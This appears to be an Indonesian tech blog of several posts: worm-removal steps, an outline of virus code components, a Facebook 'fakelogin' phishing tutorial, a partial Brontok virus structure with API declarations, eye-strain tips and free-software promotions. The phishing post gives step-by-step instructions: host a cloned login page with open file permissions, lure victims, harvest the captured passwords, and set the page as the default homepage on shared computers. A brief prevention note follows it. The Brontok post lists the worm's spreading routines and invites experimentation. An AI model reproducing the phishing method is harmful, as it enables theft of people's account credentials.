o Klik kanan My Computer, pilih Properties.


o Pilih tab System Restore, beri ceklist pilihan “Turn off System restore”.


o Klik Apply, Klik OK.



Gambar 9, Matikan System restore



ü Matikan dan hapus virus. (lihat gambar 10)


o Download tools Dr.Web CureIt pada :


http://www.freedrweb.com/download+cureit


o Jalankan file tools tersebut, kemudian pilih semua drive yang ada.


o Klik Scan, biarkan hingga selesai. (jangan di restart dahulu).



Gambar 10, Scan dengan Dr.Web CureIt



klik 2x file yang telah anda download, hingga muncul pesan komputer yang sedang berjalan pada mode EPM (Enhanced Protection Mode), dan klik OK.


Klik OK jika muncul notifikasi untuk menjalankan, kemudian klik START pada menu yang ditampilkan dan klik “Yes” pada notifikasi Start scan now?.


Maka Dr.Web akan melakukan proses scanning pada komputer anda dan akan memunculkan pesan jika terdapat virus, klik Move. Biarkan hingga selesai.


Restart komputer, jika diperlukan.



ü Hapus Registry Windows yang telah ditambahkan oleh worm dengan langkah berikut :


o Klik Menu [Start]


o Klik [Run]


o Ketik "regedit", kemudian klik tombol [OK] hingga muncul tampilan "Registry Editor"


o Pada aplikasi tersebut, cari key berikut :


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (lihat gambar 11)


o Hapus key yang memiliki data seperti "C:\Documents and Settings\%user%\[nama_acak].exe"



Gambar 11, Hapus key



ü Rubah Registry Windows yang telah ditambahkan oleh worm dengan langkah berikut : (lihat gambar 12)


Ø Klik Menu [Start]


Ø Klik [Run]


Ø Ketik "regedit", kemudian klik tombol [OK] hingga muncul tampilan "Registry Editor"


Ø Pada aplikasi tersebut, cari key berikut :


Ø HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced


Ø Rubah key yang memiliki data seperti "ShowSuperHidden" dari 0 menjadi 1.



Gambar 12, Rubah key



ü Tampilkan folder yang disembunyikan dengan menggunakan script berikut :


attrib -s -h /s /d


· Klik Menu [Start]


· Klik [Run]


· Ketik "cmd", kemudian klik tombol [OK] hingga muncul tampilan "Command Prompt"


· Arahkan lokasi cursor pada drive removable folder yang disembunyikan


· Kemudian jalankan script "attrib -s -h /s /d" (lihat gambar 13)



Gambar 13, Munculkan folder yang disembunyikan



ü Install Security Patch MS10-046 sesuai dengan versi windows yang anda miliki. Silahkan anda download pada link berikut :


http://www.microsoft.com/technet/security/Bulletin/MS10-046.mspx



ü Untuk pembersihan yang optimal dan mencegah infeksi ulang, sebaiknya menggunakan antivirus yang ter-update dan mengenali virus ini dengan baik.

Kode Kunci Virus!

Salam virus Mania!!!

OK temen2 pada posting sebelumnya, kita sudah kenalan sama bocah kecil mungil namun sangat menjengkelkan! Namanya tidak lain dan tidak bukan adalah Virus! nah sekarang kita masih akan tetap membahas nya. Tapi . . . ., kali ini kita akan membahas tentang kode kunci dari Virus itu sendiri! Penasaran??! Yuk . . mari kita simak tulis berikut ini, . . . .

Virus pada umumnya mempunyai struktur yang hampir sama dan dapat dibedakan menjadi beberapa kode, yaitu :

  1. Kode Penanda Virus


Setiap virus pasti mempunyai identitas masing-masing.bisa dibuat dengan karakter atau jumlah byte tertentu sebagai marker sesuai keinginan si programmer.

  1. Kode Penggandaan Virus


Suatu program tidak bisa dikatakan virus jika tidak dapat menggandakan dirinya sendiri.

  1. Kode Pertahanan


Kode ini diperlukan virus untuk mengecoh antivirus, bisa dengan meng-encrypt file virus tersebut, men-disable kan proses pada komputer korban, mencegah pemanggilan file atau installer program antivirus, ataupun membunuh program antivirus.

  1. Kode Pemicu


Setiap virus mempunyai program atau kode untuk mengaktifkan program utamanya. Program atau kode ini bisa dipicu dengan bermacam-macam cara bisa dengan langsung  langsung file virus, bisa juga dengan memanfaatkan file autorun.inf pada setiap drive.

  1. Kode Manipulasi


Kode ini  berguna untuk menghapus file, menjalankan aplikasi tertentu untuk mencuri atau mengirimkan data kesebuah email.

Nah temen2 udah tau kan kode apa saja yang digunakan oleh virus . ..

Pada posting selanjutnya, kita akan mebahas tentang source kode tersebut! Seru bukan??! Tunggu aja tanggal mainnya! OK??! see you later . . .!!

Senin, 01 November 2010

"Curi" Password facebook "cara klasik" pake fakelogin!

Nnnahh!! Satu lage! Hacking facebook pake fakelogin!

Meski cara ini sudah tergolong usang, basi n kuno! (koyo seng nulis, Javanese red), tapi cara ne mase tergolong ampuh lo! Karena masih . .  aja banyak orang yg mau2 nya aja kejebak ma yg namanya fakelogin! Ga bgt gitu loh . . .

Ne sekedar sharing aja kok, yang udah tau yo peneran . . . yg blom tau yo ne tak kasih tau . ..

Fakelogin tu opo sich??! fake login terdiri dari dari dua kata yaitu : Fake dan Login. Fake artinya palsu dan login artinya masuk. Jadi yang dimaksud dengan fake login adalah halaman palsu untuk masuk (login) ke akun/halaman website tertentu, misal facebook, friendster, blog dan lain-lain. Tampilannya pun sama persis tak ada beda dengan yang aslinya.

Siapa sangka dan siapa duga halaman yang kita anggap login facebook itu ternyata palsu!!! Memang pada achirnya kita akan dtuntun ke halaman facebook yang kita maksud, tapi . . . password ma username nya mampir dulu di database nya si “maling cyber”! kurang ajar banget kan !!!

Nah pengen tau caranya po pengen tau cara pencegahannya?! Po dua2 nya??! hayo . . .  ya udah,, Yuk langsung aja disimak . . . .

Cara mebuat “kue” fakelogin:

  1. siapkan secangkir kopi n cemilan pastinya,,

  2. daftar sebuah domain dan webhosting. Yang gratisan ajalah . ..  (domainnya, daftar disini n webhostingnya disini)

  3. download file script fakekogin disini.

  4. Ekstraksi dulu filenya, maka akan muncul 3 file yaitu, index.html, logs.php dan logs.txt trus langsung aja di upload di hosting file yang kamu ekstrak tadi. Jangan lupa pula untuk change mode semua file nya,          sehingga permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di eksekusi(x). Jadi chmod 777 adalah untuk merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file permission 777 adalah (rwxrwxrwx) untuk Unix Server. Untuk masalah permission ini juga tergantung dari penyedia hosting, buat yang pake hosting gak nyediain change mode, langsung ajah dicoba tanpa memperhatikan poin ini & berdoa saja ini bisa berjalan.. Selain 777 explore permission bisa menjadi 775, 755 disesuaikan dengan server dan penyedia hosting anda.

  5. Promosikan link website kita di forum kirm kan lewat email ato terserah kamu lah . ..  yang penting, orang merasa tertarik untuk masuk ke login facebook kamu ato fakelogin buatanmu tadi..

  6. nah untuk “Memanen” hasil login jebakan mu tadi, kamu tinggal buka file login.txt ( misalnya: http://www.domainkamu.com/login.txt)

  7. klo mo liat contohnya, silahkan liat disini!


satu lagi trik seorang pembohong ( pembuat fakelogin! wkwkwkwkwk)  agar aksinya berhasil dan berjalan mulus. Yaitu dengan membuat default website ato home page suatu browser dengan alamat website fakelogin dia!! Baik di computer local pribadi maupun computer umum seperti di warnet or di lab2 kompi!! Ati2 nuh . . .

Caution!!! Agar anda terhindar dari trik jahat klasik ini, ada satu hal penting yang harus kamu perhatikan. Yaitu, address halaman login facebook yang asli akan selalu seperti ini dan tidak akan pernah berubah (http://www.facebook.com) dan kalaupun berbeda mungkin hanya ada tambahan dibelakangnya! So, jika melihat tampilan login facebook tapi address awalnya selain daripada yang saya sebutkan tadi, maka abaikan saja!! OK!!

(tutorialnya sengaja ane persulit ‘ga pake gambar n dipersingkat’ agar tidak terjadi mal praktek dan hal2 yang tidak diinginkan! Hehehehe . . .)

Semoga bermanfaat!

Sabtu, 23 Oktober 2010

Source Kode Virus "Brontok"

Salam Virus Mania!!!

Nah ini dia virus brontok yang beberapa tahun lalu sempat “Naik Daun” dan melejit namanya di dunia Cyber n Komputer. Silahkan yang mo coba-coba buat eksperimen or cuman mo ngetes anti viruz za...
Virus ini terdiri dari 1 form da 1 Module, dengan nama Form -> BrontokForm Module -> API
Dengan detail berikut:
Begin VB.Form BrontokForm
Caption = \"Brontok.A\"
ForeColor = &H8000000F&
ScaleMode = 1
BeginProperty Font
Name = \"\"
Size = 195323.4944
Charset = 29
Weight = 774
EndProperty
Begin VB.Timer TmrBrontok
Enabled = 0 \'False
Interval = 2000
Left = 2160
Top = 0
Width = 57352
Height = 1
End
End
Dengan nama Project: Brontok.vbp, yang disimpan pada directory:
F:\\VPROJECT\\REHAB\\Re-1\\BRONTOK.A
Ada beberapa procedure & function yang digunakan dengan nama:
Form_QueryUnload(Cancel As Integer, UnloadMode As Integer)
TmrBrontok_Timer()
Subr_004()
CekKoneksiInternet()
ManipulasiExec()
Subr_007()
KeluarDong()
BronReg()
CopyAppData()
DownloadVir()
StartDong()
StartUp()
DecTeks()
MutMutex()
MutCr()
DownloadFile()
CekUpdate()
InfekNetwork()
Judul()

CekRemDisk() BikinFile()
GetEmailFile()
CekValidMail()
GetTeks()
CekKar()
ListMail()
GetTargetMBhs()
GavMailer()
BrontokMail()
Subr_031()
DataEmail()
DownMIME()
FindFilesAPI()
ListFileGav()
InfekFile()
SmallAttack()
MinggirLoe()
GetHostByNameAlias()
StripNulls()
BikinKredit()
Dan beberapa fungsi Api yang digunakan anatara lain: Fungsi Baca Tulis Ke Register:
Declare Function RegOpenKeyExA Lib \"advapi32.dll\" ()
Declare Function RegSetValueExA Lib \"advapi32.dll\" ()
Declare Function RegCloseKey Lib \"advapi32.dll\" ()
Declare Function RegCreateKeyExA Lib \"advapi32.dll\" ()
Declare Function Sleep Lib \"kernel32\" ()
Mendapatkan Spesial Folder: Declare Function SHGetPathFromIDList Lib \"shell32.dll\" ()
Declare Function SHGetSpecialFolderLocation Lib \"shell32.dll\" ()
Membaca Isi Halaman Situs:
Declare Function InternetOpenA Lib \"wininet.dll\" ()
Declare Function InternetOpenUrlA Lib \"wininet.dll\" ()
Declare Function InternetReadFile Lib \"wininet.dll\" ()
Declare Function InternetCloseHandle Lib \"wininet.dll\" ()
Mendapatkan Caption Dari Sebuah Window:
Declare Function GetWindowTextA Lib \"user32\" ()
Declare Function GetWindowTextLengthA Lib \"user32\" ()
Dapatkan HWND Window aktif:
Declare Function GetForegroundWindow Lib \"user32\" ()
Shutdown, Reboot, LogOff Windows:
Declare Function ExitWindowsEx Lib \"user32\" ()
Declare Function GetCurrentProcess Lib \"kernel32\" ()
Declare Function OpenProcessToken Lib \"advapi32\" ()
Declare Function LookupPrivilegeValueA Lib \"advapi32\" ()
Declare Function AdjustTokenPrivileges Lib \"advapi32\" ()
Mendapatkan Jenis Media yang ada spt Removable Disk, CD-Rom dll:
Declare Function GetDriveTypeA Lib \"kernel32\" ()
Declare Function ShellExecuteA Lib \"shell32.dll\" ()
Declare Function RtlMoveMemory Lib \"kernel32\" ()
Winsock API:
Declare Function closesocket Lib \"wsock32.dll\" ()
Declare Function connect Lib \"wsock32.dll\" ()
Declare Function htons Lib \"wsock32.dll\" ()
Declare Function inet_addr Lib \"wsock32.dll\" ()
Declare Function recv Lib \"wsock32.dll\" ()
Declare Function send Lib \"wsock32.dll\" ()
Declare Function socket Lib \"wsock32.dll\" ()
Declare Function gethostbyname Lib \"wsock32.dll\" ()
Declare Function WSAStartup Lib \"wsock32.dll\" ()
Declare Function WSACleanup Lib \"wsock32.dll\" ()
Declare Function WSAAsyncSelect Lib \"wsock32.dll\" ()
Fungsi yang berhubungan dengan file:
Declare Function FindFirstFileA Lib \"kernel32\" ()
Declare Function FindNextFileA Lib \"kernel32\" ()
Declare Function GetFileAttributesA Lib \"kernel32\" ()
Declare Function FindClose Lib \"kernel32\" ()
dll...
Dari source kode diatas jelas banget terlihat si “brontok” ini memakai mberbagai cara untuk berkebang biak. Dengan cara pengiriman lewat email, masuk dan ke dalam folder Sharing dls. Jika dilihat kembali pada strukturnya ada beberapa kata yang di encrypt, kemungkinan berupa exploit code atau apalah namanya. hanya allah dan pembuat virus yang tau.
Virus ini mempunyai fungsi ExitWindowsEx yang diimport dari file user32.dll, fungsi ini biasanya digunakan untuk mematikan windows. kayaknya sipembuat virus membuat triger yang berisi perintah mematikan/merestart komputer.
Selain itu dalam struktur filenya terdapat kata-kata seperti ini:
FOLDER.HTT
RORO
.HTT
.DOC
.CSV
.EML
.CFM
.PHP
.WAB
.EML
.TXT
.HTML
.HTM
MY DATA SOURCES
MY EBOOKS
MY MUSIC
MY SHAPES
MY VIDEOS
MY DOCUMENT
Dan ada beberapa alamat situs yang diserang, apa DDOS ya...hik..hik..tau deh. Selain itu pembuat virus mencantumkan nama: --JowoBot#VM Community --
Selanjutnya coba lihat tiga fungsi api berikut:
Declare Function GetWindowTextA Lib \"user32\" ()
Declare Function GetWindowTextLengthA Lib \"user32\" ()
Declare Function GetForegroundWindow Lib \"user32\" ()
Sepertinya pembuat virus memanfaatkan windowexplorer untuk memperbanyak filenya ke folder yang lain. Dengan cara membaca Caption yang terdapat pada windows aktif yang berisi nama directory/path. Dengan menggunakan 2 fungsi diatas (GetWindowTextA & GetWindowTextLengthA), Sedangkan fungsi GetForegroundWindow digunakan untuk mendapatkan Handle Window (HWND) yang sedang aktif.
Jadi kesimpulannya virus ini tidak dapat menyalin dirinya kalo Caption pada windowExplorer bukan berupa Directory/Path. Sehinga si pembuat virus menonaktifkan setting pada Folder Options.
Kemudian yang lebih unik lagi virus ini membaca isi halaman situs yang terbuka pada sebuah InternetExplorer dengan menggunakan fungsi:
Declare Function InternetOpenA Lib \"wininet.dll\" ()
Declare Function InternetOpenUrlA Lib \"wininet.dll\" ()
Declare Function InternetReadFile Lib \"wininet.dll\" ()
Declare Function InternetCloseHandle Lib \"wininet.dll\" ()
Kalo saya tebak, sepertinya pembuat virus mencari alamat email pada halaman situs yang terbuka dan mengirimkan virus nya berdasarkan alamat email yang ditemukan pada halaman tersebut dengan kata kunci seperti mailto: ataupun @xxxx.com dll...
klo pengen menonaktifkan virus ini secara cepat, coba masuk safemode kemudian rename file MSVBVM60.dll menjadi MSVBVM60.dl_
karena virus ini membutuhkan runtime vb. Nah kalo udah gak aktif baru kita bisa hapus beberapa registry entry dan file-file virus brontoknya.
Sayang sekali virus ini tidak menggunakan program compressor, sehingga memudahkan orang untuk mengenalinya.
Semoga bermanfaat..... 

Jumat, 24 September 2010

5 Tips Hindari Mata Lelah di Depan Monitor

Beberapa dari kita tentu memiliki kebiasaan untuk bekerja berlama-lama  di depan monitor PC, entah untuk bekerja atau melakukan hal lain seperti bermain game dan browsing. Alhasil efek mata lelah dan kepala pening pun tak dapat dihindari. Walau banyak yang menganggap fakta ini tidak sepenuhnya benar, namun kenyataannya hal ini tetap mempengaruhi kesehatan mata kita. Efeknya terkadang kita sedikit kesulitan untuk memfokuskan objek pandang, dan sebagainya. Hal ini tentunya diakibatkan pancaran radiasi monitor yang terlalu lama saat kita bekerja.
Seperti dikutip detikINET dari softpedia, Senin (14/9/2009) berikut ini adalah beberapa tips menghindari mata lelah, saat berada di depan monitor:

1. Jaga jarak pandang dari monitor.

Berada terlalu dekat dengan monitor memang sedikit membahayakan bagi mata kita. Seharusnya kita menjaga jarak pandang ke monitor kita dengan baik. Jarak yang disarankan adalah sekitar 20-40 inchi (50-100cm) dari mata.

Jika kita masih kesulitan membaca padahal monitor sudah berada pada jarak 20 inchi, cobalah untuk memperbesar font kita hingga kita merasa nyaman.

2. Singkirkan CRT, Beralih ke LCD

Monitor tabung (CRT) memang memberi efek yang lebih buruk dibanding LCD, selain energi yang dibutuhkan juga lebih besar. Cobalah mengganti monitor CRT kita dengan LCD.

Namun harga monitor LCD memang lebih mahal dibanding CRT. Bagi kita yang masih menyeyangi monitor CRT, ada baiknya kita membeli filter anti-radiasi. ini adalah solusi untuk mengurangi rasa nyeri mata akibat duduk berlama-lama di depan monitor, namun dengan harga yang murah.

3. Atur monitor setting

Beberapa monitor yang ada sekarang banyak menyediakan pre-set display mode, untuk memudahkan pengguna mengganti setting layar mereka. Pre-set setting tersebut memberi level brightnes yang berbeda, untuk menyesuaikan kondisi penggunaan monitor. Adakalanya manfaatkan hal tersebut.

Misal settingan seperti, 'text' atau 'internet' akan terasa lebih sejuk di mata, saat kita gunakan untuk mengetik ataupun browsing. Setingan 'game' atau 'movie' akan terlihat lebih terang saat digunakan.

4. Gunakan kacamata anti radiasi


Walau hal ini membutuhkan biaya yang relatif lebih mahal, namun ada baiknya saat memiliki cukup uang kita membeli kacamata anti-radiasi. Selain bisa dibawa kemanapun kita bekerja, kacamata ini tak hanya berguna saat kita bekerja di depan monitor, namuna juga melindungi mata dari cahaya lampu mobil, radiasi TV, dan sebagainya.

Faktanya lapisan anti-radiasi pada kacamata tersebut, sangat berguna bagi mata kita. Karena lapisan tersebut secara otomatis mengurangi efek nyeri di mata akibat radiasi cahaya berlebih.

5. Mengistirahatkan mata sejenak, secara berkala


Cara termudah menghindari mata lelah akibat radiasi monitor adalah mengistirahatkannya secara berkala. Cobalah untuk mengistirahatkan mata sekitar 5 menit tiap jamnya. Kita dapat menggunakan waktu 5 menit tersebut untuk berjalan-jalan, melihat pemandangan, mencuci muka dan sebagainya. Yang penting menjauh dari monitor.

Sumber: Detik.com

Rabu, 24 Februari 2010

Software Yang Bisa Diajak Bicara



software ini bernama "Answerpad"

Kalau anda ingin berbincang - bincang dengan software ini, anda harus bisa berbahasa inggris. .

software bisa juga kita perintahkan membuka program2 bawaan windows di laptop anda...

yaitu : notepad, cmd, explorer, regedit, msconfig, dll seperti anda membuka program dari RUN
Perintahnya adalah :

Start the program called Notepad

Start the program called cmd

Start the program called Regedit

Bila software ini menjawab : OK,Program started

maka program yang kalian sebutkan akan terbuka...

penasaran ?? silahkan download software nya disini

Recovery Data Dengan Easus

Ini dia yang ane namakan siapa cepat dia dapat big grin , Untuk kali ini ane posting software yang harga normalnya mencapai $69.95 atau sekitar 650rb an ini bisa anda dapatkan secara gratis 100% tanpa bayar. INGAT : Trik ini berlaku HANYA SAMPAI 18 MARET jam 9 pagi waktu setempat (18 Maret, 9:00 EST).

Software yang ane bagi saat ini adalah EASEUS Data Recovery Wizard 5.0.1 Full version. EASEUS Data Recovery Wizard merupakan software yang amat sangat bermanfaat untuk merecovery data, seperti mengembalikan data yang hilang karena partisi yang terformat, file yang terhapus, atau hilangnya data akibat kerusakan device, kerusakan software, infeksi virus, lampu mati dan alasan merusak lainnya.

EASEUS Data Recovery Wizard 5.0.1 memiliki fitur sebagai berikut :
1. Recover dan mengembalikan file yang hilang karena terhapus
2. Recover dan mengembalikan file yang hilang karena terformat, bahkan setelah anda menginstall ulang windows anda
3. Disk recovery setelah hardisk anda crash
4. Mengembalikan data yang hilang karena partisi yang rusak
5. mengembalikan data dari hardisk RAW
6. Recover dokumen office, foto, gambar, video, musik, email dsb
7. Recover dari hardisk, USB drive, memory card, Memory stick, camera card, Zip, floppy disk dan storage media lainnya
8. Support file sistem seperti FAT12, FAT16, FAT32, NTFS/NTFS5
9. Bisa digunakan di windows 2000/XP/2003/Vista/2008/windows 7
10. Bootable media
11. Recovery file yang berkualitas tinggi
12. Bisa memperbaiki file .PST, .DBX, .XLS dan .DOC

EASEUS Data Recovery Wizard 5.0.1 support hard disk apapun, dari yang jadul hingga yang RAID terbaru. EASEUS Data Recovery Wizard 5.0.1 merupakan solusi pengamanan, recovery dan pengembalian file – file dan dokumen anda yang hilang secara profesional.

Secara normal EASEUS Data Recovery Wizard 5.0.1 dijual seharga $69.95 atau sekitar 650rb an. Namun anda sobat – sobat PG tidak perlu membayar sebegitu mahal untuk memperoleh software ini. Sobat PG bisa memperolehnya secara legal dan gratis Hanya sampai 18 Maret jam 9:00 waktu setempat (18 Maret jam 9:00 EST)

Untuk memperolehnya, maka silahkan download software EASEUS Data Recovery Wizard 5.0.1 unlocked full version disini dan pastikan anda segera menginstallnya setelah mendownloadnya.

Perlu sobat ketahui, ini adalah EASEUS Data Recovery Wizard 5.0.1 full version legal dan original. Buruaan download sebelum masa berlakunya habis..

Jumat, 19 Februari 2010

Konversi PDF ke Dokumen Word

alam rangka promosi AnyBizSoft memberikan gratis PDF to Word Converter versi 2.53 yang harga aslinya $29.95. PDF to Word Converter merupakan software yang dapat Anda gunakan untuk mengubah (convert) file PDF menjadi file MS Word versi 2010, 2007 dan 2003.

Untuk mendapatkan PDF to Word Converter secara gratis caranya sebagai berikut:

1. Download PDF to Word Converter di sini.
2. Buka halaman ini, dan isikan data nama dan alamat email Anda.

klik-kanan

3. Tekan tombol Send me Keycode. Gunakan alamat email yang benar karena kode registrasi akan dikirim via email.
4. Buka email yang Anda gunakan untuk melakukan registrasi, cari email dengan subyek ”AnyBizSoft PDF to Word Converter 2.5.3 Registration Mail”.
5. Install software PDF to Word Converter.
6. Klik menu Register dan masukkan alamat email dan kode registrasi yang telah Anda dapatkan.

klik-kanan

7. Klik tombol register.

Penawaran gratis PDF to Word Converter ini berlaku sampai dengan tanggal 1 Maret 2010.

Artikel Gratis PDF to Word Converter Full Version ini dipersembahkan oleh Klik-Kanan.com. Kunjungi Klik-Kanan.com untuk informasi seputar komputer dan internet. | February 9, 2010

Rabu, 17 Februari 2010

Kembalikan data yang hilang dengan get data back

GetDataBack adalah utiliti software untuk penyelamatan data dan dapat menemukan file penting yang hilang untuk dapat kembali digunakan. Sistem GetDataBack sangat aman. Cara kerja software ini mengunakan sistem Safe dan tidak menyentuh media yang akan direcover kembali.

Apapun yang terjadi dari data anda pada sebuah storage baik harddisk sampai flash disk. Dalam kondisi media storage masih bisa terditeksi masih bisa diselamatkan oleh GetDataBack.

Dalam kondisi apa saja yang dapat dilakukan software ini untuk menyelamatkan data anda :

  • Ter-Delete data secara tidak sengaja dari semua jenis media. Termasuk file didalam sub / directory.

  • Hilangnya partisi bahkan sampai sebuah media/harddisk yang telah terhapus partisinya dapat dicari kembali file yang ada pada media storage

  • Hilangnya file karena virus attack yang menghapus file pada media storage dapat ditemukan kembali.


Media apa saja yang dapat diselamatkan oleh GetDataBack, GetDataBack recovers from :

  • Hard drives (IDE, SCSI, SATA)

  • USB drives

  • Firewire drives

  • Partitions

  • Dynamic Disks

  • Floppy drives

  • Drive images

  • Zip/Jaz drive

  • Compact Flash Cards

  • Smart Media Cards

  • Secure Digital Cards

  • USB Flash Drive

  • iPod Disks


Prepare recovery data




GetDataBack dapat bekerja pada sistem Windows 95/98/ME/NT/2000/XP. Software GetDataBack terbagi dua sistem file yaitu NTFS atau FAT. Artinya ada 2 jenis software GetDataBack apakah untuk data NTFS atau FAT. Pengoperasian software ini dapat bekerja dengan Pentium processor dan minimal 32MB.

Saran ketika melakukan backup dengan GetDataBack, minimal dibutuhkan satu media storage dengan kapasitas yang sama atau lebih besar dari ukuran data yang akan dikembalikan. Misalnya anda ingin menyelamatkan data dengan berukuran 30GB, maka pada computer anda minimal memiliki 30GB space free untuk melakukan copy file atau backup file dengan harddisk kedua atau partisi lain diluar partisi yang ingin direcover

Saran kedua adalah tidak melakukan access pada media yang akan direcover. Upaya ini untuk membiarkan kondisi data tetap aman dan tidak hancur secara tidak sengaja tertulis- overwritten. Sangat disarankan untuk mengunakan 1 buah harddisk sebagai sistem operasi dan digabungkan media atau harddisk lain yang akan diselamatkan. Dan harddisk pertama dapat difungsikan sebagai media backup atau copy dari software GetDataBack

4/3 step recovery data




Terdapat 4 option pada GetDataBack :

1. I Don’t know , use default setting : pilihan ini untuk pemula pemakai software GetDataBack. GetDataBack akan mengambil semua langkah dari 3 step pilihan yang ada

2. Systematic file system damage : Pilihan ini diambil bila media atau harddisk storage telah dilakukan format atau hilangnya partisi. Bahkan sistem harddisk anda tidak memiliki partisi lagi dapat dapat mengunakan GetDataBack untuk melakukan recovery file asalkan harddisk anda memang masih dapat bekerja

3. Sustained file system damage : kondisi paling parah karena file yang ada pada sistem harddisk sudah tertimpa data baru misalnya dengan menginstall OS. Walaupun sangat tipis menemukan data yang telah terhapus, diharapkan masih sedikit tersisa data anda yang dapat diselamatkan oleh GetDataBack

4. I want to recover Delete file : Cara ini paling umum terjadi karena data terdelete. GetDataBack dapat melakukan recover data baik file dan directory untuk dikembalikan utuh seperti semula termasuk nama file dan nama directory.

Dibawah ini adalah cara mengunakan GetDataBack, 2 kondisi yang diuji oleh kami adalah undelete file dan recover data dari partisi yang terhapus.

Recovery undelete with GetDatBack




Untuk melakukan undelete file ada 4 langkah melakukan recover dengan GetDataBack.

Step awal adalah memilih kondisi penyelamatan yaitu dengan option I want to recover Delete file.

Step kedua akan akan ditampilkan dimana letak data pada sebuah storage misalnya harddisk. Anda dapat memilih drive letter dari letak data yang akan diselamatkan



Step ketiga nantinya akan ditampikan kondisi data anda, bila indicator menunjukan warna hijau atau green maka data anda masih dapat dikembalikan secara utuh



Step keempat adalah mencari nama file dan directory dari daftar software GetDataBack. Dan anda cukup mengcopy file yang anda inginkan untuk dibackup ke media atau storage lain



Pada test undelete GetDataback untuk NTFS, semua file yang akan direcover dapat dikembalikan dengan nama-nama file seperti semula. Untuk kecepatan melakukan recovery data yang terdelete, dibutuhkan waktu sekitar 15 menit dari 50GB partisi

Recovery Lost Partition with GetDatBack




Pada test partisi recover, kami mengunakan format FAT dengan 1 media storage Gigabyte i-Ram Disk 2GB

Berbeda dengan step recover delete file, untuk terformat atau hilangnya partisi anda minimal harus mengetahui letak partisi atau harddisk yang terhapus.

Step pertama setelah anda memilih option Systematic file system damage, maka anda harus memilih media / drive letter (partisi) yang telah terhapus yang berisikan data file anda.

Pada gambar dibawah ini, storage GIGABYTA i-RAM disk berkapasitas 2GB FAT dibuat terhapus oleh WIndows. Anda cukup meng-click nomor media atau nama harddisk storage anda



Step kedua, anda harus memilih indikator dari Green / warna hijau. Kondisi Green tersebut diartikan file anda tetap berada didalam harddisk atau storage, tetapi anda sudah kehilangan partisi anda.



Step ketiga, biarkan beberapa saat GetDataBack mencari file yang hilang tetapi masih tersimpan didalam stoarge. Pada gambar dibawah ini adalah langkah setelah step 2 dilakukan dan file dan directory dapat kembali ditemukan. Anda cukup melakukan click mouse kanan dan mengcopy data anda kembali kemedia penyimpan lain untuk melakukan backup



Test GetDataBack untuk mencari file yang hilang setelah terhapusnya partisi lebih memerlukan waktu. Pada test pencarian 50GB dibutuhkan waktu 1 jam lebih. Tetapi seluruh file yang dicari dapat dikembalikan seperti semula termasuk nama directory serta nama file

 

Saran untuk pemakaian GetDataBack




Dibawah ini saran untuk penyelamatan untuk pemakaian software GetDataBack. Jangan mengunakan GetDataBack dan menginstall pada harddisk yang sama. Disarakankan untuk mengambil langkah seperti dibawah ini.

  • Gunakan computer lain dan menempatkan media storage yang berbeda dari software dengan media yang akan diselamatkan.

  • Gunakan computer berkecepatan tinggi serta memory yang cukup besar.

  • Lepaskan harddisk yang akan direcover dan tempatkan pada computer lain sebagai SLAVE / SECOND harddisk.


Result




Hilangnya partisi atau file tidak menjadikan malam anda seperti adengan film Nightmare yang menakutkan. Asalkan anda mengetahui apa yang terjadi dan menyiapkan langkah pengembalian data anda yang hilang. GetDataBack NTFS dan FAT adalah sebuah software recover data untuk menyelamatkan data yang terhapus. GetDataBack menyediakan pilihan dengan kemudahan dan langkah sederhana untuk menyelamatkan data anda. Baik hilangnya sebuah partisi pada media storage dari harddisk sampai flash disk, atau terhapusnya file karena terdelete dapat dikembalikan oleh software GetDataback. Bahkan pada test undelete file, GetDataBack dapat mengembalikan nama file secara utuh untuk test NTFS. GetDataBack ideal dimiliki oleh para kalangan IT untuk pencegahan bila terjadi hilangnya data akibat secara disengaja maupun tidak seperti serangan virus. GetDataBack juga menyediakan pilihan jenis format FAT dan NTFS, dan software ini ditawarkan lebih ekonomis.

Jika anda berminat, Silahkan Download file nya Disini